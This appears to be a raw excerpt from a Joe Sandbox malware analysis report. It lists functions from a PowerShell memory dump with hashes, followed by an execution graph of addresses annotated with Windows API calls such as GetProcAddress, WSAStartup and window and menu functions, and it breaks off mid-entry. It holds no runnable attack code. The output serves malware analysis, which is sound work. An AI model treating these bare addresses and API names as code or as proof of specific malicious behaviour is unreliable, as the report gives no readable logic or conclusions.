                                                          Function 07CB1A88 Relevance: 7.6, Strings: 6, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                          • API String ID: 0-2392861976
                                                          • Opcode ID: af0fa75ea136a9959df1e5114c0b5ff513ce77e81ea00f663247d907d481ac57
                                                          • Instruction ID: a3ba029d5bf246a016fc360e7f9f29e77098f662b4dc52a27823b45fcd8b8e40
                                                          • Opcode Fuzzy Hash: af0fa75ea136a9959df1e5114c0b5ff513ce77e81ea00f663247d907d481ac57
                                                          • Instruction Fuzzy Hash: 6C314BF1B0021E8FCB345E7A88A06E7BBE6AB85611F1C846FE8058B205EF31D644C791
                                                          Function 07CB1A69 Relevance: 5.1, Strings: 4, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^q$$^q$$^q$$^q
                                                          • API String ID: 0-2125118731
                                                          • Opcode ID: 2b4b42e0498c29ee38c464d215dc3b344cbace4b47b3af01a8ff95cdcfb754c5
                                                          • Instruction ID: 1dd45f4ab59d3e8ea0f8ac2e2f7bb55bf3385b6a7edd730cb45c4b1a19f8c2e4
                                                          • Opcode Fuzzy Hash: 2b4b42e0498c29ee38c464d215dc3b344cbace4b47b3af01a8ff95cdcfb754c5
                                                          • Instruction Fuzzy Hash: 9A21DBF1A0434EDFDB354F6585A06E67FF1AF42611F1C44EBE8448B146EB319644C791
                                                          Function 07CB0F97 Relevance: 5.0, Strings: 4, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1716023511.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7cb0000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$$^q$$^q
                                                          • API String ID: 0-2049395529
                                                          • Opcode ID: 428fc1b0c52480fff56af801a1489b91734e81590339ae8e5f25689e165398c2
                                                          • Instruction ID: 214d746baabdecbd4908dd497c53ad0798ec81fe6954c787324630e6e571f6c7
                                                          • Opcode Fuzzy Hash: 428fc1b0c52480fff56af801a1489b91734e81590339ae8e5f25689e165398c2
                                                          • Instruction Fuzzy Hash: 08F028607083AA8FCB3A066918645EB5FB65FC2A11B29459BE041DF286CE218DC5C393

                                                          Execution Graph

                                                          Execution Coverage:3.6%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:19.7%
                                                          Total number of Nodes:1086
                                                          Total number of Limit Nodes:71
                                                          execution_graph 80352 7ff738a598ec 80357 7ff738a57aa0 80352->80357 80355 7ff738a598cb SetWindowTextA 80356 7ff738a59910 80355->80356 80358 7ff738a57b27 80357->80358 80359 7ff738a57ab5 80357->80359 80358->80355 80358->80356 80366 7ff738a6fd50 80359->80366 80364 7ff738a6ecc0 8 API calls 80365 7ff738a57ad1 80364->80365 80365->80358 80365->80364 80372 7ff738affacc 63 API calls 80365->80372 80373 7ff738a6f680 80366->80373 80369 7ff738a6f680 134 API calls 80370 7ff738a57abf 80369->80370 80370->80358 80371 7ff738affacc 63 API calls 80370->80371 80371->80365 80372->80365 80374 7ff738a6f68f 80373->80374 80377 7ff738a6f6ae 80374->80377 80378 7ff738aa8560 134 API calls 80374->80378 80377->80369 80379 7ff738a352a7 80537 7ff738a72840 80379->80537 80385 7ff738a3530e 80386 7ff738a5a760 135 API calls 80385->80386 80387 7ff738a35313 80386->80387 80388 7ff738a51fc0 CreateDialogParamA ShowWindow SetActiveWindow DestroyWindow 80387->80388 80389 7ff738a35318 80388->80389 80390 7ff738a73f30 135 API calls 80389->80390 80391 7ff738a3531d 80390->80391 80392 7ff738a35331 RegisterClipboardFormatA 80391->80392 80393 7ff738a35344 80391->80393 80392->80393 80394 7ff738a3d570 141 API calls 80393->80394 80395 7ff738a35349 80394->80395 80396 7ff738a72b00 134 API calls 80395->80396 80397 7ff738a35355 80396->80397 80398 7ff738a72b00 134 API calls 80397->80398 80399 7ff738a35364 80398->80399 80400 7ff738a72b00 134 API calls 80399->80400 80401 7ff738a35373 80400->80401 80402 7ff738a3537b GetProcAddress GetProcAddress 80401->80402 80403 7ff738a353a3 80401->80403 80402->80403 80404 7ff738a353bc GetProcAddress GetProcAddress 80403->80404 80405 7ff738a353e4 80403->80405 80404->80405 80406 7ff738a35438 80405->80406 80407 7ff738a353fd GetProcAddress GetProcAddress GetProcAddress 80405->80407 80408 7ff738a3546e 80406->80408 80409 7ff738a3545c GetProcAddress 80406->80409 80407->80406 80410 7ff738a3547c GetProcAddress GetProcAddress 80408->80410 80411 7ff738a354a4 80408->80411 80409->80408 80410->80411 80412 7ff738a728b0 11 API calls 80411->80412 80413 7ff738a354bd 80412->80413 80414 7ff738a6f680 134 API calls 80413->80414 80415 7ff738a354cf memcpy_s 80414->80415 80416 7ff738a6cdf0 134 API calls 80415->80416 80417 7ff738a3553d CoInitializeEx 80416->80417 80418 7ff738a35551 80417->80418 80419 7ff738a355c0 80417->80419 80420 7ff738a6ea20 134 API calls 80418->80420 80421 7ff738a3cf20 253 API calls 80419->80421 80422 7ff738a35564 MessageBoxA 80420->80422 80423 7ff738a355d4 memcpy_s 80421->80423 80424 7ff738a35587 80422->80424 80426 7ff738a6d200 98 API calls 80423->80426 80425 7ff738ae9230 swprintf 8 API calls 80424->80425 80428 7ff738a35597 80425->80428 80427 7ff738a355fe 80426->80427 80429 7ff738a6d200 98 API calls 80427->80429 80430 7ff738a35615 80429->80430 80431 7ff738a6d200 98 API calls 80430->80431 80432 7ff738a35637 80431->80432 80433 7ff738a6d200 98 API calls 80432->80433 80434 7ff738a3565a 80433->80434 80435 7ff738a356b1 GetDesktopWindow GetClientRect 80434->80435 80436 7ff738a35678 GetMonitorInfoA 80434->80436 80438 7ff738a356c8 80435->80438 80436->80438 80439 7ff738a6eb00 137 API calls 80438->80439 80440 7ff738a35729 80439->80440 80441 7ff738a6eb00 137 API calls 80440->80441 80442 7ff738a35738 80441->80442 80443 7ff738a6eb00 137 API calls 80442->80443 80444 7ff738a35749 80443->80444 80445 7ff738a6d140 98 API calls 80444->80445 80446 7ff738a35761 80445->80446 80447 7ff738a6d200 98 API calls 80446->80447 80448 7ff738a3577e 80447->80448 80449 7ff738a6d140 98 API calls 80448->80449 80450 7ff738a357a3 80449->80450 80451 7ff738a6d140 98 API calls 80450->80451 80452 7ff738a357bf 80451->80452 80453 7ff738a31080 140 API calls 80452->80453 80454 7ff738a357d9 CreateWindowExW 80453->80454 80455 7ff738a35848 80454->80455 80456 7ff738a3582c GetLastError 80454->80456 80458 7ff738a358cb GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 80455->80458 80461 7ff738a35870 MonitorFromWindow 80455->80461 80457 7ff738a74050 134 API calls 80456->80457 80460 7ff738a35839 80457->80460 80459 7ff738a3590c 80458->80459 80463 7ff738a35924 SetWindowLongPtrA 80459->80463 80462 7ff738a362f0 134 API calls 80460->80462 80467 7ff738a35895 80461->80467 80462->80455 80464 7ff738a36380 188 API calls 80463->80464 80465 7ff738a35945 80464->80465 80466 7ff738a6f680 134 API calls 80465->80466 80468 7ff738a35965 80466->80468 80467->80458 80467->80459 80469 7ff738a40ee0 144 API calls 80468->80469 80470 7ff738a359b9 80469->80470 80471 7ff738a359ec 80470->80471 80472 7ff738afa0ec 98 API calls 80470->80472 80473 7ff738a6d140 98 API calls 80471->80473 80472->80471 80474 7ff738a35a03 80473->80474 80475 7ff738a6d200 98 API calls 80474->80475 80476 7ff738a35a2f 80475->80476 80477 7ff738a5bc50 134 API calls 80476->80477 80478 7ff738a35a56 80477->80478 80479 7ff738a6d200 98 API calls 80478->80479 80480 7ff738a35a7d 80479->80480 80481 7ff738a6d200 98 API calls 80480->80481 80482 7ff738a35a90 80481->80482 80483 7ff738a6d200 98 API calls 80482->80483 80484 7ff738a35aa3 80483->80484 80485 7ff738a418a0 142 API calls 80484->80485 80486 7ff738a35ab7 GetWindowRect GetClientRect 80485->80486 80487 7ff738a6d200 98 API calls 80486->80487 80488 7ff738a35aef GetWindowRect 80487->80488 80489 7ff738a35b9c 80488->80489 80490 7ff738a35be3 GetDesktopWindow GetClientRect 80488->80490 80489->80490 80491 7ff738a35ba8 GetMonitorInfoA 80489->80491 80492 7ff738a35bfe 80490->80492 80493 7ff738a35c40 SetWindowPos 80490->80493 80491->80492 80492->80493 80494 7ff738a6f680 134 API calls 80493->80494 80496 7ff738a35c9e memcpy_s 80494->80496 80497 7ff738a35cae CreateBitmap 80496->80497 80498 7ff738a6f720 80497->80498 80499 7ff738a35cd7 10 API calls 80498->80499 80500 7ff738a68690 136 API calls 80499->80500 80501 7ff738a35e06 80500->80501 80502 7ff738a35e10 DeleteMenu 80501->80502 80502->80502 80503 7ff738a35e25 80502->80503 80504 7ff738a35e82 AppendMenuA 80503->80504 80505 7ff738a35e40 AppendMenuA 80503->80505 80514 7ff738a35ea1 80504->80514 80505->80505 80506 7ff738a35e7d 80505->80506 80506->80504 80506->80514 80507 7ff738a35eff 12 API calls 80508 7ff738a6d200 98 API calls 80507->80508 80509 7ff738a36008 AppendMenuA AppendMenuA 80508->80509 80510 7ff738a35ec0 80509->80510 80511 7ff738a3603d AppendMenuA 80510->80511 80512 7ff738a6ea20 134 API calls 80510->80512 80511->80510 80513 7ff738a35ecf AppendMenuA 80512->80513 80513->80514 80514->80507 80515 7ff738a36057 80514->80515 80516 7ff738a36060 80515->80516 80517 7ff738a36cf0 138 API calls 80516->80517 80518 7ff738a36082 GetKeyboardLayout GetLocaleInfoA 80517->80518 80519 7ff738afb554 62 API calls 80518->80519 80520 7ff738a360b1 ShowWindow SetForegroundWindow GetForegroundWindow 80519->80520 80521 7ff738a49e10 140 API calls 80520->80521 80522 7ff738a360e5 UpdateWindow 80521->80522 80523 7ff738a360ff 80522->80523 80524 7ff738a36130 PeekMessageA 80523->80524 80526 7ff738a5c5e0 134 API calls 80523->80526 80529 7ff738a5c6b0 98 API calls 80523->80529 80530 7ff738a361c7 PeekMessageW 80523->80530 80531 7ff738a36210 80523->80531 80533 7ff738a361f4 IsWindow 80523->80533 80536 7ff738a361b0 DispatchMessageW 80523->80536 80524->80523 80525 7ff738a3614f GetForegroundWindow 80524->80525 80527 7ff738a49e10 140 API calls 80525->80527 80528 7ff738a36172 MsgWaitForMultipleObjects 80526->80528 80527->80523 80528->80523 80529->80523 80530->80523 80532 7ff738a36ef0 134 API calls 80531->80532 80534 7ff738a3621c 80532->80534 80535 7ff738a36201 IsDialogMessageA 80533->80535 80533->80536 80535->80523 80536->80523 80541 7ff738a7284e 80537->80541 80538 7ff738a352f6 80542 7ff738a6a030 80538->80542 80540 7ff738a7287e GetProcAddress 80540->80541 80541->80538 80541->80540 80610 7ff738a72b00 80541->80610 80543 7ff738a72b00 134 API calls 80542->80543 80544 7ff738a6a040 80543->80544 80545 7ff738a6a06f GetProcAddress 80544->80545 80546 7ff738a72b00 134 API calls 80544->80546 80547 7ff738a6a0ce 80545->80547 80548 7ff738a6a084 80545->80548 80549 7ff738a6a05f 80546->80549 80551 7ff738a72b00 134 API calls 80547->80551 80550 7ff738a6a094 GetProcAddress 80548->80550 80557 7ff738a6a138 80548->80557 80549->80545 80552 7ff738a6a7a6 80549->80552 80553 7ff738a6a0b8 GetProcAddress 80550->80553 80550->80557 80554 7ff738a6a0da 80551->80554 80660 7ff738a362f0 134 API calls 80552->80660 80556 7ff738a6a11d 80553->80556 80554->80557 80558 7ff738a6a0e6 GetProcAddress 80554->80558 80556->80557 80559 7ff738a6a129 GetProcAddress 80556->80559 80561 7ff738a6a163 GetProcAddress 80557->80561 80562 7ff738a6a172 80557->80562 80558->80557 80563 7ff738a6a109 GetProcAddress 80558->80563 80559->80557 80560 7ff738a6a7b2 80661 7ff738a362f0 134 API calls 80560->80661 80561->80562 80566 7ff738a6a18b GetProcAddress 80562->80566 80595 7ff738a6a5d5 80562->80595 80563->80556 80567 7ff738a6a1af GetProcAddress 80566->80567 80566->80595 80568 7ff738a6a1d3 GetProcAddress 80567->80568 80567->80595 80569 7ff738a6a1f7 GetProcAddress 80568->80569 80568->80595 80570 7ff738a6a21b GetProcAddress 80569->80570 80569->80595 80571 7ff738a6a23f GetProcAddress 80570->80571 80570->80595 80572 7ff738a6a263 GetProcAddress 80571->80572 80571->80595 80573 7ff738a6a287 GetProcAddress 80572->80573 80572->80595 80574 7ff738a6a2ab GetProcAddress 80573->80574 80573->80595 80575 7ff738a6a2cf GetProcAddress 80574->80575 80574->80595 80576 7ff738a6a2f3 GetProcAddress 80575->80576 80575->80595 80577 7ff738a6a317 GetProcAddress 80576->80577 80576->80595 80578 7ff738a6a33b GetProcAddress 80577->80578 80577->80595 80579 7ff738a6a35f GetProcAddress 80578->80579 80578->80595 80580 7ff738a6a383 GetProcAddress 80579->80580 80579->80595 80581 7ff738a6a3a7 GetProcAddress 80580->80581 80580->80595 80582 7ff738a6a3cb GetProcAddress 80581->80582 80581->80595 80583 7ff738a6a3ef GetProcAddress 80582->80583 80582->80595 80584 7ff738a6a413 GetProcAddress 80583->80584 80583->80595 80585 7ff738a6a437 GetProcAddress 80584->80585 80584->80595 80586 7ff738a6a45b GetProcAddress 80585->80586 80585->80595 80587 7ff738a6a47f GetProcAddress 80586->80587 80586->80595 80588 7ff738a6a4a3 GetProcAddress 80587->80588 80587->80595 80589 7ff738a6a4c7 GetProcAddress 80588->80589 80588->80595 80590 7ff738a6a4eb GetProcAddress 80589->80590 80589->80595 80591 7ff738a6a50f GetProcAddress 80590->80591 80590->80595 80592 7ff738a6a533 GetProcAddress 80591->80592 80591->80595 80593 7ff738a6a557 GetProcAddress 80592->80593 80592->80595 80594 7ff738a6a57b GetProcAddress 80593->80594 80593->80595 80594->80595 80596 7ff738a6a59f GetProcAddress 80594->80596 80598 7ff738a6a721 WSAStartup 80595->80598 80596->80595 80597 7ff738a6a5c3 GetProcAddress 80596->80597 80597->80598 80599 7ff738a6a73d 80598->80599 80600 7ff738a6a74a WSAStartup 80598->80600 80599->80600 80601 7ff738a6a78e 80599->80601 80602 7ff738a6a76c WSAStartup 80600->80602 80603 7ff738a6a75f 80600->80603 80657 7ff738a70bc0 80601->80657 80602->80560 80604 7ff738a6a781 80602->80604 80603->80601 80603->80602 80604->80560 80604->80601 80607 7ff738a54620 80608 7ff738a72b00 134 API calls 80607->80608 80609 7ff738a54632 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80608->80609 80616 7ff738aa8ca0 80610->80616 80615 7ff738a72b3a 80615->80541 80617 7ff738a72b0e 80616->80617 80618 7ff738aa8cb0 GetSystemDirectoryA 80616->80618 80622 7ff738a6e7a0 80617->80622 80618->80617 80619 7ff738aa8cca 80618->80619 80628 7ff738a6f730 80619->80628 80621 7ff738aa8d03 GetSystemDirectoryA 80621->80617 80621->80619 80624 7ff738a6e7d4 80622->80624 80623 7ff738a6f680 134 API calls 80626 7ff738a6e820 80623->80626 80624->80623 80646 7ff738ae9230 80626->80646 80629 7ff738a6f76a 80628->80629 80630 7ff738a6f751 80628->80630 80632 7ff738a6f79d 80629->80632 80642 7ff738afa0ec 98 API calls 3 library calls 80629->80642 80641 7ff738afa0ec 98 API calls 3 library calls 80630->80641 80634 7ff738a6f7c3 80632->80634 80643 7ff738afa0ec 98 API calls 3 library calls 80632->80643 80639 7ff738a6f7e1 80634->80639 80644 7ff738afa0ec 98 API calls 3 library calls 80634->80644 80640 7ff738a6f85b memcpy_s 80639->80640 80645 7ff738aa8560 134 API calls 80639->80645 80640->80621 80641->80629 80642->80632 80643->80634 80644->80639 80647 7ff738ae9239 80646->80647 80648 7ff738a6e886 LoadLibraryA 80647->80648 80649 7ff738ae9300 IsProcessorFeaturePresent 80647->80649 80648->80615 80650 7ff738ae9318 80649->80650 80655 7ff738ae9444 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 80650->80655 80652 7ff738ae932b 80656 7ff738ae94b8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 80652->80656 80655->80652 80658 7ff738a6f680 134 API calls 80657->80658 80659 7ff738a35309 80658->80659 80659->80607 80662 7ff738a567ed 80663 7ff738a57aa0 135 API calls 80662->80663 80664 7ff738a567fa 80663->80664 80665 7ff738a56dfc 80664->80665 80666 7ff738a56813 80664->80666 80668 7ff738a56e0b 80665->80668 80669 7ff738a5716a 80665->80669 80667 7ff738a6f680 134 API calls 80666->80667 80672 7ff738a56825 80667->80672 80673 7ff738a56e8d 80668->80673 80677 7ff738a54750 4 API calls 80668->80677 80670 7ff738a5717a 80669->80670 80671 7ff738a572f5 80669->80671 80679 7ff738a54750 4 API calls 80670->80679 80680 7ff738a571e9 80670->80680 80675 7ff738a54750 4 API calls 80671->80675 80728 7ff738a54fc0 12 API calls swprintf 80672->80728 80723 7ff738a54750 MapDialogRect 80673->80723 80675->80680 80677->80673 80678 7ff738a56853 80681 7ff738a57505 80678->80681 80683 7ff738a6f680 134 API calls 80678->80683 80679->80680 80682 7ff738a54750 4 API calls 80680->80682 80684 7ff738a6f680 134 API calls 80681->80684 80704 7ff738a55e35 80681->80704 80682->80678 80687 7ff738a57488 SendDlgItemMessageA 80683->80687 80685 7ff738a57535 80684->80685 80729 7ff738a70ca0 80685->80729 80687->80681 80689 7ff738a57570 80690 7ff738a5758e 80689->80690 80739 7ff738afa0ec 98 API calls 3 library calls 80689->80739 80692 7ff738a70ca0 134 API calls 80690->80692 80693 7ff738a5759f 80692->80693 80702 7ff738a575bd 80693->80702 80740 7ff738afa0ec 98 API calls 3 library calls 80693->80740 80694 7ff738afa0ec 98 API calls 80694->80704 80695 7ff738a579e9 80696 7ff738ae9230 swprintf 8 API calls 80695->80696 80699 7ff738a579fd 80696->80699 80697 7ff738a57904 80697->80695 80700 7ff738a54750 4 API calls 80697->80700 80700->80695 80714 7ff738a57630 80702->80714 80741 7ff738affacc 63 API calls 80702->80741 80742 7ff738afa0ec 98 API calls 3 library calls 80702->80742 80703 7ff738a57a5a 80757 7ff738afa0ec 98 API calls 3 library calls 80703->80757 80704->80694 80704->80697 80704->80703 80707 7ff738a57a73 80758 7ff738a37d20 100 API calls swprintf 80707->80758 80710 7ff738a57a78 80711 7ff738a576a5 GetDlgItem 80711->80714 80714->80704 80714->80711 80717 7ff738a57710 80714->80717 80743 7ff738a71980 80714->80743 80753 7ff738afa0ec 98 API calls 3 library calls 80714->80753 80754 7ff738afa0ec 98 API calls 3 library calls 80714->80754 80715 7ff738a71980 98 API calls 80715->80717 80716 7ff738a57755 GetDlgItem 80716->80717 80717->80704 80717->80715 80717->80716 80720 7ff738a577fc GetDlgItem 80717->80720 80721 7ff738a5781c ScreenToClient 80717->80721 80755 7ff738afa0ec 98 API calls 3 library calls 80717->80755 80756 7ff738afa0ec 98 API calls 3 library calls 80717->80756 80720->80717 80721->80717 80722 7ff738a57850 SetWindowPos 80721->80722 80722->80717 80724 7ff738a5483c 80723->80724 80725 7ff738a54782 CreateWindowExA SendMessageA 80723->80725 80724->80678 80726 7ff738a5480f 80725->80726 80726->80724 80727 7ff738a54813 SetWindowPos 80726->80727 80727->80724 80728->80678 80730 7ff738a70ca7 80729->80730 80731 7ff738a70cb2 80729->80731 80732 7ff738a71099 80730->80732 80736 7ff738a70ce7 80730->80736 80731->80689 80733 7ff738a6f680 134 API calls 80732->80733 80735 7ff738a70d47 80733->80735 80734 7ff738a6f680 134 API calls 80734->80736 80735->80689 80736->80734 80736->80735 80737 7ff738a71206 80736->80737 80738 7ff738a6f680 134 API calls 80737->80738 80738->80735 80739->80690 80740->80702 80741->80702 80742->80702 80744 7ff738a71a09 80743->80744 80746 7ff738a719a8 80743->80746 80763 7ff738afa0ec 98 API calls 3 library calls 80744->80763 80759 7ff738a71750 80746->80759 80748 7ff738a71a05 80749 7ff738ae9230 swprintf 8 API calls 80748->80749 80750 7ff738a71a3d 80749->80750 80750->80714 80751 7ff738a719cd 80751->80748 80752 7ff738a71750 98 API calls 80751->80752 80752->80751 80753->80711 80754->80714 80755->80716 80756->80717 80757->80707 80758->80710 80760 7ff738a71763 80759->80760 80762 7ff738a7176f 80759->80762 80760->80762 80764 7ff738afa0ec 98 API calls 3 library calls 80760->80764 80762->80751 80763->80746 80764->80762 80765 7ff738af93b0 80766 7ff738af93c0 80765->80766 80769 7ff738af93c9 80765->80769 80766->80769 80771 7ff738af946c 80766->80771 80772 7ff738af9485 80771->80772 80785 7ff738af93d2 80771->80785 80787 7ff738b022fc 80772->80787 80774 7ff738af948a 80791 7ff738b0964c GetEnvironmentStringsW 80774->80791 80777 7ff738af94a3 80812 7ff738af9610 59 API calls 4 library calls 80777->80812 80778 7ff738af9497 80811 7ff738b02e14 11 API calls 2 library calls 80778->80811 80781 7ff738af94ab 80813 7ff738b02e14 11 API calls 2 library calls 80781->80813 80783 7ff738af94ca 80814 7ff738b02e14 11 API calls 2 library calls 80783->80814 80785->80769 80786 7ff738af983c 80 API calls 3 library calls 80785->80786 80786->80769 80788 7ff738b02309 80787->80788 80790 7ff738b02338 wcsftime 80787->80790 80815 7ff738b01a9c 64 API calls 3 library calls 80788->80815 80790->80774 80792 7ff738b0967c 80791->80792 80793 7ff738af948f 80791->80793 80816 7ff738b0959c WideCharToMultiByte 80792->80816 80793->80777 80793->80778 80795 7ff738b096cd 80796 7ff738b096d4 FreeEnvironmentStringsW 80795->80796 80797 7ff738b039a0 wcsftime 12 API calls 80795->80797 80796->80793 80798 7ff738b096e7 80797->80798 80799 7ff738b096f8 80798->80799 80800 7ff738b096ef 80798->80800 80801 7ff738b0959c wcsftime WideCharToMultiByte 80799->80801 80802 7ff738b02e14 __free_lconv_mon 11 API calls 80800->80802 80803 7ff738b0971b 80801->80803 80804 7ff738b096f6 80802->80804 80805 7ff738b09729 80803->80805 80806 7ff738b0971f 80803->80806 80804->80796 80808 7ff738b02e14 __free_lconv_mon 11 API calls 80805->80808 80807 7ff738b02e14 __free_lconv_mon 11 API calls 80806->80807 80809 7ff738b09727 FreeEnvironmentStringsW 80807->80809 80808->80809 80809->80793 80811->80785 80812->80781 80813->80783 80814->80785 80815->80790 80817 7ff738a7e4d0 80818 7ff738a7e503 80817->80818 80821 7ff738a7e57f 80817->80821 80824 7ff738a7e662 80818->80824 80825 7ff738a7e520 80818->80825 80830 7ff738a7e623 80818->80830 80889 7ff738a7e642 80818->80889 80819 7ff738a7e637 80828 7ff738a7e895 80819->80828 80819->80889 80943 7ff738a594d0 100 API calls 80819->80943 80820 7ff738ae9230 swprintf 8 API calls 80823 7ff738a7e91a 80820->80823 80821->80889 80910 7ff738a58f50 135 API calls swprintf 80821->80910 80822 7ff738a7e6e5 80911 7ff738a814a0 194 API calls 80822->80911 80826 7ff738ae9230 swprintf 8 API calls 80824->80826 80825->80889 80890 7ff738a59d00 80825->80890 80852 7ff738a7e5b9 80826->80852 80956 7ff738a66840 135 API calls swprintf 80828->80956 80829 7ff738a7e72b 80829->80819 80834 7ff738a7e732 80829->80834 80830->80819 80830->80822 80830->80829 80842 7ff738a7e749 80834->80842 80854 7ff738a7e7e3 80834->80854 80837 7ff738a7e7a2 80841 7ff738a7e8fc 80837->80841 80869 7ff738a7e7aa 80837->80869 80838 7ff738a7e8a5 80843 7ff738a7e8b8 80838->80843 80957 7ff738a59f30 MessageBoxA 80838->80957 80840 7ff738ae9230 swprintf 8 API calls 80840->80830 80841->80889 80962 7ff738a59f20 MessageBeep 80841->80962 80917 7ff738a594d0 100 API calls 80842->80917 80848 7ff738a68690 136 API calls 80843->80848 80845 7ff738a7e541 80851 7ff738a7e572 80845->80851 80903 7ff738a59210 80845->80903 80855 7ff738a7e8cf 80848->80855 80849 7ff738a7e6f8 80849->80889 80912 7ff738a6e760 80849->80912 80858 7ff738ae9230 swprintf 8 API calls 80851->80858 80852->80840 80853 7ff738a7e751 80853->80841 80857 7ff738a7e759 80853->80857 80859 7ff738a7e8f4 80854->80859 80864 7ff738a6e760 98 API calls 80854->80864 80854->80889 80856 7ff738a68690 136 API calls 80855->80856 80860 7ff738a7e8d9 80856->80860 80918 7ff738a68d80 136 API calls 80857->80918 80858->80821 80862 7ff738a6e760 98 API calls 80859->80862 80958 7ff738a59f60 80860->80958 80862->80841 80865 7ff738a7e80c 80864->80865 80865->80859 80944 7ff738a58ad0 98 API calls 80865->80944 80867 7ff738a7e76e 80919 7ff738a68690 80867->80919 80868 7ff738a7e8e5 80872 7ff738a59f60 SetWindowTextA 80868->80872 80952 7ff738a76a00 80869->80952 80872->80889 80874 7ff738a7e778 80876 7ff738a68690 136 API calls 80874->80876 80875 7ff738a7e821 80875->80859 80877 7ff738a7e829 80875->80877 80878 7ff738a7e782 80876->80878 80945 7ff738a6cdf0 80877->80945 80878->80868 80882 7ff738a7e849 80883 7ff738a7e936 80882->80883 80885 7ff738a6e760 98 API calls 80882->80885 80963 7ff738a59f20 MessageBeep 80883->80963 80886 7ff738a7e864 80885->80886 80886->80883 80887 7ff738a7e86c 80886->80887 80951 7ff738a6cf80 134 API calls 80887->80951 80889->80820 80891 7ff738a59d45 80890->80891 80893 7ff738a59d0f 80890->80893 80896 7ff738a59140 80891->80896 80892 7ff738a71980 98 API calls 80892->80893 80893->80891 80893->80892 80894 7ff738a59d47 80893->80894 80894->80891 80895 7ff738a59d4f SendDlgItemMessageA 80894->80895 80895->80891 80901 7ff738a59154 80896->80901 80902 7ff738a59185 80896->80902 80897 7ff738a71980 98 API calls 80897->80901 80899 7ff738a591a0 SendDlgItemMessageA 80899->80845 80901->80897 80901->80902 80902->80899 80964 7ff738afa0ec 98 API calls 3 library calls 80902->80964 80907 7ff738a59229 80903->80907 80909 7ff738a59266 80903->80909 80905 7ff738a71980 98 API calls 80905->80907 80906 7ff738a59281 SendDlgItemMessageA 80906->80845 80907->80905 80907->80909 80909->80906 80965 7ff738afa0ec 98 API calls 3 library calls 80909->80965 80910->80852 80911->80849 80966 7ff738a6d200 80912->80966 80917->80853 80918->80867 80920 7ff738a686a3 80919->80920 80923 7ff738a686de 80919->80923 80921 7ff738a6fd50 134 API calls 80920->80921 80922 7ff738a686a8 80921->80922 80934 7ff738a686b4 80922->80934 80996 7ff738a68e00 80922->80996 80923->80874 80926 7ff738a68751 81005 7ff738a6ecc0 8 API calls swprintf 80926->81005 80929 7ff738a68749 81004 7ff738a689a0 RegCloseKey 80929->81004 80932 7ff738a6871d 80932->80929 81002 7ff738a6ecc0 8 API calls swprintf 80932->81002 81003 7ff738a68e60 135 API calls 80932->81003 80933 7ff738a6f680 134 API calls 80936 7ff738a687d1 80933->80936 80934->80933 80942 7ff738afdd02 80936->80942 81006 7ff738af8ec8 11 API calls _get_daylight 80936->81006 80938 7ff738afdcf7 81007 7ff738b02f2c 59 API calls _invalid_parameter_noinfo 80938->81007 80940 7ff738ae9230 swprintf 8 API calls 80941 7ff738afe0c0 80940->80941 80941->80874 80942->80940 80943->80837 80944->80875 80946 7ff738a6f680 134 API calls 80945->80946 80947 7ff738a6ce07 80946->80947 80948 7ff738a70bc0 134 API calls 80947->80948 80949 7ff738a6ce16 80948->80949 80950 7ff738a814a0 194 API calls 80949->80950 80950->80882 80951->80889 80953 7ff738a76a0b 80952->80953 80955 7ff738a76a26 80952->80955 80954 7ff738a6f680 134 API calls 80953->80954 80954->80955 80955->80828 80956->80838 80959 7ff738a59f6f 80958->80959 80960 7ff738a5a007 80959->80960 80961 7ff738a59ff9 SetWindowTextA 80959->80961 80960->80868 80961->80959 80964->80899 80965->80906 80967 7ff738a6d24a 80966->80967 80968 7ff738a6d231 80966->80968 80970 7ff738a6d26a 80967->80970 80991 7ff738afa0ec 98 API calls 3 library calls 80967->80991 80990 7ff738afa0ec 98 API calls 3 library calls 80968->80990 80972 7ff738a71980 98 API calls 80970->80972 80973 7ff738a6d27e 80972->80973 80974 7ff738a6d29f 80973->80974 80992 7ff738afa0ec 98 API calls 3 library calls 80973->80992 80976 7ff738ae9230 swprintf 8 API calls 80974->80976 80977 7ff738a6d2af 80976->80977 80978 7ff738a6d390 80977->80978 80979 7ff738a6d3da 80978->80979 80980 7ff738a6d3c1 80978->80980 80981 7ff738a6d3fa 80979->80981 80994 7ff738afa0ec 98 API calls 3 library calls 80979->80994 80993 7ff738afa0ec 98 API calls 3 library calls 80980->80993 80984 7ff738a71980 98 API calls 80981->80984 80985 7ff738a6d40e 80984->80985 80986 7ff738a6d42f 80985->80986 80995 7ff738afa0ec 98 API calls 3 library calls 80985->80995 80988 7ff738ae9230 swprintf 8 API calls 80986->80988 80989 7ff738a6d440 80988->80989 80989->80889 80990->80967 80991->80970 80992->80974 80993->80979 80994->80981 80995->80986 81008 7ff738a72ce0 80996->81008 80999 7ff738a6870a 80999->80926 81001 7ff738a68e60 135 API calls 80999->81001 81000 7ff738a6f680 134 API calls 81000->80999 81001->80932 81002->80932 81003->80932 81005->80934 81006->80938 81007->80942 81009 7ff738a72dfc 81008->81009 81014 7ff738a72d18 81008->81014 81010 7ff738ae9230 swprintf 8 API calls 81009->81010 81011 7ff738a68e28 